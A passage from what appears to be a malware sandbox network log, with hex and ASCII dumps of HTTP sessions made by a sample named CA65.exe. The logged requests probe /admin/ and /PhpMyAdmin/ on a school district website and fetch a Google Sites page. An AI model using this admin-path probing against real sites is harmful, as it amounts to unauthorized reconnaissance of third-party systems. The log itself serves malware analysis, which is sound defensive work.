3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 Data Ascii: 4317<path d="M180 175V75l80 65m0-65v100m90-100v100m80-100v100h65m135 0h-60V75h60m-60 50h50" stroke="currentColor" stroke-width="10" stroke-linecap="round" stroke-linejoin="round" /><path stroke="#B68257" stroke-width="10" stroke-linecap="round" stroke
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 34 2e 35 20 33 37 31 2e 35 20 39 32 20 33 37 31 2e 35 20 39 32 63 2d 38 2d 33 2e 32 31 38 32 2d 31 35 2d 31 30 2e 38 37 35 33 2d 31 35 2d 31 30 2e 38 37 35 33 20 33 20 30 20 37 2d 32 2e 36 32 34 37 20 37 2d 32 2e 36 32 34 37 53 33 35 34 2e 35 20 37 33 20 33 35 30 20 36 37 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 2f 6d 61 73 6b 3e 0a 3c 67 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 64 29 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 61 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 37 20 37 33 63 2d 32 2e 31 36 37 20 31 2e 35 2d 31 30 2e 32 20 35 2d 31 39 20 35 Data Ascii: 4.5 371.5 92 371.5 92c-8-3.2182-15-10.8753-15-10.8753 3 0 7-2.6247 7-2.6247S354.5 73 350 67z" fill="url(#paint1_linear)" /></mask><g filter="url(#filter0_d)" stroke-width="2" stroke-linecap="round" mask="url(#a)"><path d="M357 73c-2.167 1.5-10.2 5-19 5
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 37 34 22 20 63 79 3d 22 31 31 31 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 32 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 33 38 22 20 63 79 3d 22 38 33 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 33 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 38 37 22 20 63 79 3d 22 31 33 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 34 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 31 35 22 20 63 79 3d 22 31 33 30 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 35 5f 6c 69 6e Data Ascii: _linear)" /><circle cx="374" cy="111" r="2" fill="url(#paint12_linear)" /><circle cx="338" cy="83" r="2" fill="url(#paint13_linear)" /><circle cx="387" cy="132" r="2" fill="url(#paint14_linear)" /><circle cx="315" cy="130" r="2" fill="url(#paint15_lin
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 35 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 34 2e 32 35 22 20 79 31 3d 22 31 31 31 2e 35 22 20 78 32 3d 22 33 34 34 2e 32 35 22 20 79 32 3d 22 31 32 32 2e 33 30 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 Data Ascii: arGradient><linearGradient id="paint5_linear" x1="344.25" y1="111.5" x2="344.25" y2="122.305" gradientUnits="userSpaceOnUse"><stop stop-color="#FAB914" /><stop offset="1" stop-color="#FA6714" /></linearGradient><linearGradient id="paint6_linear" x1="
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 32 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 37 34 22 20 79 31 3d 22 31 30 39 22 20 78 32 3d 22 33 37 34 22 20 79 32 3d 22 31 31 33 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 33 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 33 38 22 20 79 31 3d 22 38 31 22 20 78 32 3d 22 Data Ascii: ent><linearGradient id="paint12_linear" x1="374" y1="109" x2="374" y2="113" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint13_linear" x1="338" y1="81" x2="
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 72 4d 61 74 72 69 78 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 76 61 6c 75 65 73 3d 22 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 37 20 30 22 20 2f 3e 0a 3c 66 65 4f 66 66 73 65 74 20 64 79 3d 22 31 22 20 2f 3e 0a 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 22 20 2f 3e 0a 3c 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 20 76 61 6c 75 65 73 3d 22 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 2e 30 39 20 30 22 20 2f 3e 0a 3c 66 65 42 6c 65 6e 64 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f Data Ascii: rMatrix in="SourceAlpha" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" /><feOffset dy="1" /><feGaussianBlur stdDeviation="1" /><feColorMatrix values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.09 0" /><feBlend in2="BackgroundImageFix" result="effect1_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
297	192.168.2.4	55704	104.17.166.123	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	398	OUT	GET /admin/ HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=9nMpgZd_MPixYtN75meezzeXJbEVPllqefCj4nL_tAA-1703276108-1-AU3jr90pv9/5sF5wI3dHxkz5wSZY2jHvoYUU/QJ8FlTPgy96ra2bHdXmA4hRnnNF5p791j4n6x0UbKTwyDBVGqk= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	397	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Ray: 839b090c8ae11283-MIA CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Last-Modified: Fri, 06 Dec 2013 14:07:42 GMT Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding X-Powered-By: ASP.NET Server: cloudflare alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:11 UTC	972	IN	Data Raw: 36 31 62 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 2e 2e 2f 61 64 6d 69 6e 2e 63 66 6d 27 29 0d 0a 2f 2f 2d 2d 3e 0d 0a 3c 2f 73 63 72 69 70 74 3e 20 0d 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6a 73 20 3d 20 22 77 69 6e 64 6f 77 5b 27 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 27 5d 3d 7b 72 3a 27 38 33 39 62 30 39 30 63 38 61 65 31 31 32 38 33 27 2c 74 3a 27 4d 54 63 77 4d 7a 49 33 4e 6a 45 78 4d 43 34 35 4e 44 55 77 4d 44 41 3d 27 7d 3b 5f 63 70 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 5f 63 70 6f 2e Data Ascii: 61b<script language="JavaScript">...document.location.replace('../admin.cfm')//--></script> <script>(function(){var js = "window['__CF$cv$params']={r:'839b090c8ae11283',t:'MTcwMzI3NjExMC45NDUwMDA='};_cpo=document.createElement('script');_cpo.
2023-12-22 20:15:11 UTC	598	IN	Data Raw: 65 72 29 3b 7d 20 65 6c 73 65 20 7b 76 61 72 20 70 72 65 76 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 7d 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 70 72 65 76 28 65 29 3b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 20 21 3d 3d 20 27 6c 6f 61 64 69 6e 67 27 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 3d 20 70 72 65 76 3b 68 61 6e 64 6c 65 72 28 29 3b 7d 7d 3b 7d 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 Data Ascii: er);} else {var prev = document.onreadystatechange \|\| function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script><script defer src="https://stat
2023-12-22 20:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
298	192.168.2.4	55645	192.178.50.46	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	184	OUT	GET /site/mcammondlife/ HTTP/1.1 Host: sites.google.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	1149	IN	HTTP/1.1 302 Found Content-Type: application/binary X-Frame-Options: DENY Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Location: https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://sites.google.com/site/mcammondlife/&followup=https://sites.google.com/site/mcammondlife/ P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: base-uri 'self';object-src 'none';report-uri /_/view/cspreport;script-src 'unsafe-inline' 'unsafe-eval' https: http:;worker-src 'self';frame-ancestors https://google-admin.corp.google.com/ Cross-Origin-Opener-Policy: unsafe-none Cross-Origin-Resource-Policy: same-site Date: Fri, 22 Dec 2023 20:15:10 GMT Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=511=hdHKsKIruv2GQdoGdnVWnqaorUJZi2NB7Ebc6UI3VYzEm6KNJL9fzvIeqT32pDJTi7LRXyY89gzgvDszuahobiYDNdKiE8nf4Etg-piKIzo3_UmfgGxMAi1QKUshtyPuF07RrjL7UpiK0yhDIrSQCEpDQXsrXpy6siSH8XiLleY; expires=Sat, 22-Jun-2024 20:15:10 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
299	192.168.2.4	55739	104.17.166.123	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	403	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=ucx3pOM_revKRy3PUZhR4fbePLT_VPJMo9ZkSAtigv4-1703276108-1-Aeh4NEzSG5xuquXJ5/AefPhynLJasNhQDx2mqDEHQXlnjftxGCzkXKCwdRHhr2UOQM8Phbk5PjCTVrAlQ0IPNLk= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	733	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 839b090cdccf25e3-MIA CF-Cache-Status: MISS Cache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15 Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Security-Policy: Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: ea80f6ed-4132-4fe3-a861-1c0719970084 X-Runtime: 0.584906 X-Xss-Protection: 1; mode=block Server: cloudflare alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:11 UTC	636	IN	Data Raw: 63 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 4c 69 62 65 72 74 79 20 45 6c 65 6d 65 6e 74 61 72 79 20 53 63 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 3c Data Ascii: c93<!DOCTYPE html>...[if lte IE 8]> <html lang="en-US" class="lt-ie9"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head><meta charset="utf-8"><title>404 - Page Not Found - Liberty Elementary School District<
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 66 20 28 77 69 6e 64 6f 77 2e 67 61 29 20 7b 0a 09 09 09 09 09 09 09 09 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 67 61 54 65 73 74 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 31 39 39 31 39 33 37 37 31 2d 31 27 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 27 2f 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 27 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 2c 20 31 30 29 3b 0a 09 09 09 09 09 7d 29 28 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d Data Ascii: f (window.ga) {clearInterval(gaTest);ga('create', 'UA-199193771-1');ga('send', 'pageview', '/Page Not Found/www.liberty25.org/PhpMyAdmin/');}}, 10);})();</script><script>(function(w,d,s,l,i){w[l]
2023-12-22 20:15:11 UTC	1221	IN	Data Raw: 09 0a 0a 09 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2e 63 66 6d 3f 62 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 09 3c 73 74 79 6c 65 20 69 64 3d 22 66 73 48 53 4c 43 6f 6c 6f 72 73 22 3e 0a 09 09 09 3a 72 6f 6f 74 20 7b 0a 09 09 09 7d 0a 09 09 3c 2f 73 74 79 6c 65 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 75 70 6c 6f 61 64 65 64 2f 74 68 65 6d 65 73 2f 70 6f 6d 66 72 65 74 5f 76 35 2f 6d 61 69 6e 2e 63 73 73 3f 31 36 33 38 35 36 33 34 36 35 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 Data Ascii: <link href="/styles.cfm?b" media="screen" rel="stylesheet"><style id="fsHSLColors">:root {}</style><link rel="stylesheet" media="all" href="/uploaded/themes/pomfret_v5/main.css?1638563465" /><link rel="stylesheet" media="all"
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 69 6e 64 6f 77 29 20 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 46 53 2e 63 75 72 72 65 6e 74 50 61 67 65 20 3d 20 7b 0a 09 09 09 09 64 61 74 65 46 6f 72 6d 61 74 3a 20 27 6d 64 27 2c 0a 09 09 09 09 68 6f 6d 65 70 61 67 65 56 69 64 65 6f 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 3a 20 74 72 75 65 2c 0a 09 09 09 09 74 69 6d 65 46 6f 72 6d 61 74 3a 20 27 31 32 27 0a 09 09 09 7d 3b 0a 09 09 09 63 6f 6e 73 74 20 73 65 74 74 69 6e 67 73 20 3d 20 46 53 2e 67 65 74 4e 53 28 27 73 65 74 74 69 6e 67 73 27 29 3b 0a 09 09 09 73 65 74 74 69 6e 67 73 2e 73 74 79 6c 65 4d 61 6e 61 67 65 72 45 6e 61 62 6c 65 64 20 3d 20 66 61 6c 73 Data Ascii: 7ffa<script type="text/javascript">(function(window) {window.FS.currentPage = {dateFormat: 'md',homepageVideoOptimization: true,timeFormat: '12'};const settings = FS.getNS('settings');settings.styleManagerEnabled = fals
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 61 73 2d 73 65 61 72 63 68 2d 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 31 30 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 20 66 73 45 6d 62 65 64 20 6f 66 66 63 61 6e 76 61 73 2d 73 65 61 72 63 68 2d 62 75 74 74 6f 6e 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 31 31 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d Data Ascii: as-search-container" id="fsEl_2010" data-use-new="true" ><div class="fsElementContent" ><div class="fsElement fsEmbed offcanvas-search-button" id="fsEl_2011" data-use-new="true" ><div class="fsElementContent" > <button class="search-
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 73 65 61 72 63 68 2d 72 65 73 75 6c 74 73 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 6e 6f 76 61 6c 69 64 61 74 65 3d 22 6e 6f 76 61 6c 69 64 61 74 65 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 66 73 46 69 65 6c 64 4c 61 62 65 6c 22 20 66 6f 72 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 3e 53 65 61 72 63 68 3c 2f 6c 61 62 65 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 53 65 61 72 63 68 45 6c 65 6d 65 6e 74 4b 65 79 77 6f 72 64 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 66 73 53 74 79 6c 65 53 65 61 72 63 68 46 69 65 6c 64 20 66 73 53 74 79 6c 65 44 65 66 61 75 6c 74 46 69 65 6c 64 22 20 69 64 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 20 6e 61 Data Ascii: /www.liberty25.org/search-results" method="get" novalidate="novalidate"><label class="fsFieldLabel" for="fsSearchInput_2316">Search</label><div class="fsSearchElementKeyword"><input class="fsStyleSearchField fsStyleDefaultField" id="fsSearchInput_2316" na
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 65 73 22 3e 44 69 73 74 72 69 63 74 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 33 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 61 74 68 6c 65 74 69 63 73 2d 61 6e 64 2d 61 63 74 69 76 69 74 69 65 73 22 3e 41 74 68 6c 65 74 69 63 73 20 26 61 6d 70 3b 20 41 63 74 69 76 69 74 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 62 75 Data Ascii: es">District Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel3"><li><a href="/about-liberty/district-services/athletics-and-activities">Athletics & Activities</a></li><li class="fsNavParentPage"><a href="/about-liberty/district-services/bu
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 22 3e 48 65 61 6c 74 68 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 2f 69 6c 6c 6e 65 73 73 2d 61 6e 64 2d 61 74 74 65 6e 64 61 6e 63 65 22 3e 49 6c 6c 6e 65 73 73 20 61 6e 64 Data Ascii: ><li class="fsNavParentPage"><a href="/about-liberty/district-services/health-services">Health Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel4"><li><a href="/about-liberty/district-services/health-services/illness-and-attendance">Illness and
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 67 72 61 6e 74 20 45 64 75 63 61 74 69 6f 6e 20 50 72 6f 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 65 63 74 69 6f 6e 2d 35 30 34 22 3e 53 65 63 74 69 6f 6e 20 35 30 34 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 65 64 75 63 61 74 69 6f 6e 22 3e 53 70 65 63 69 61 6c 20 45 64 75 63 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 Data Ascii: grant Education Program</a></li><li><a href="/about-liberty/district-services/special-services/section-504">Section 504</a></li><li><a href="/about-liberty/district-services/special-services/special-education">Special Education</a></li></ul></div></li><li
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 72 74 79 2f 73 74 72 61 74 65 67 69 63 2d 70 6c 61 6e 22 3e 53 74 72 61 74 65 67 69 63 20 50 6c 61 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 73 75 70 65 72 69 6e 74 65 6e 64 65 6e 74 73 2d 6f 66 66 69 63 65 22 3e 53 75 70 65 72 69 6e 74 65 6e 64 65 6e 74 e2 80 99 73 20 4f 66 66 69 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 65 61 72 6e 69 6e 67 22 3e 4c 65 61 72 6e 69 6e 67 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 32 22 Data Ascii: rty/strategic-plan">Strategic Plan</a></li><li><a href="/about-liberty/superintendents-office">Superintendents 